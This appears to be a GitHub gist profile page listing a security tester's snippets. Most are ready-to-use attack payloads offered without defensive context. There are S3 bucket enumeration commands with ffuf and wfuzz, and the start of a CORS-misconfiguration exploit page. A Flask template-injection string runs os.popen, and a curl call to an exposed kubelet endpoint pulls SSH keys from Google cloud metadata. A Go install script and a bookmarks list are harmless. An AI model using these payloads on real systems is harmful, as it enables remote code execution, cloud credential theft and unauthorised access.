Skip to content

Instantly share code, notes, and snippets.

View chouaibhm's full-sized avatar

chouaib Hm chouaibhm

150 followers · 891 following
View GitHub Profile
@chouaibhm
chouaibhm / test
Last active March 5, 2020 16:25
20.43.58.82
@chouaibhm
chouaibhm / gist:9b997f149d39cf480260b3ff62eddd0f
Created February 3, 2020 13:31 — forked from the-xentropy/gist:05ab1c5efd7ae7651b14e0fb85c6312c
Use wfuzz or ffuf to enumerate s3
Ffuf (faster):
ffuf -u "https://s3.REGION.amazonaws.com/COMPANYDELIMITERENVIRONMENT" -w "aws-regions.txt:REGION" -w "company.txt:COMPANY" -w "delimiters.txt:DELIMITER" -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:ENVIRONMENT" -mc 200 -v
Wfuzz:
wfuzz -u "https://s3.FUZZ.amazonaws.com/FUZ2ZFUZ3ZFUZ4Z" -w aws-regions.txt -w company.txt -w delimiters.txt -w "/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt" --sc 200 -v -t 50
The files:
@chouaibhm
chouaibhm / calc.ps1
Created September 2, 2019 10:43
Invoke-Item c:\windows\system32\calc.exe
@chouaibhm
chouaibhm / Firefox-CORS-Misconfig.js
Created July 4, 2019 14:09 — forked from Voorivex/Firefox-CORS-Misconfig.js
<html>
<meta content="text/html;charset=utf-8" http-equiv="Content-Type">
<meta content="utf-8" http-equiv="encoding">
<body onload="CreateListReaderIframe()">
<script>
function CreateListReaderIframe() {
var ifr = document.createElement("iframe");
@chouaibhm
chouaibhm / http headers collect
Created April 23, 2019 09:12
X-HTTP-Method-Override: POST
@chouaibhm
chouaibhm / temple injection flask
Created April 22, 2019 13:13
>>> "{{ []['\x5f\x5fclass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['sys']['modules']['os']['popen']('ls')['read']() }}"
>>>"{{ []['__class__']['__base__']['__subclasses__']()[59]['__init__']['__globals__']['sys']['modules']['os']['popen']('ls')['read']() }}"
@chouaibhm
chouaibhm / Advanced-HTTP-en.md
Created April 1, 2019 11:58 — forked from nicolas-grekas/Advanced-HTTP-en.md
Advanced handling of HTTP requests in PHP
@chouaibhm
chouaibhm / bookmarks.html
Created April 1, 2019 11:39 — forked from random-robbie/bookmarks.html
Private Bookmarks
https://medium.com/handy-tech/analysis-of-a-kubernetes-hack-backdooring-through-kubelet-823be5c3d67c
https://www.cidrcalculator.com/asn/asn-to-prefix.html?lang=en
https://itnext.io/aks-kubernetes-security-walk-through-challenge-2-dbe3ed16beec
https://www.digitalinterruption.com/single-post/2018/06/04/Are-Your-Cookies-Telling-Your-Fortune
https://blog.innerht.ml/
@chouaibhm
chouaibhm / google-kube.md
Created April 1, 2019 11:19 — forked from random-robbie/google-kube.md

Retrive Public SSH keys from google metadata

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "busybox wget -q -O - --header='Metadata-Flavor: Google' http://metadata/computeMetadata/v1/project/attributes/ssh-keys?alt=json"
@chouaibhm
chouaibhm / go.sh
Created April 1, 2019 09:38 — forked from random-robbie/go.sh
install golang
echo 'Installing go...'
wget https://dl.google.com/go/go1.11.5.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.11.5.linux-amd64.tar.gz
rm go1.11.5.linux-amd64.tar.gz
export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
echo 'export GOROOT=/usr/local/go' >> ~/.bashrc
echo 'export GOPATH=$HOME/go' >> ~/.bashrc
echo 'export PATH=$PATH:$GOROOT/bin:$GOPATH/bin' >> ~/.bashrc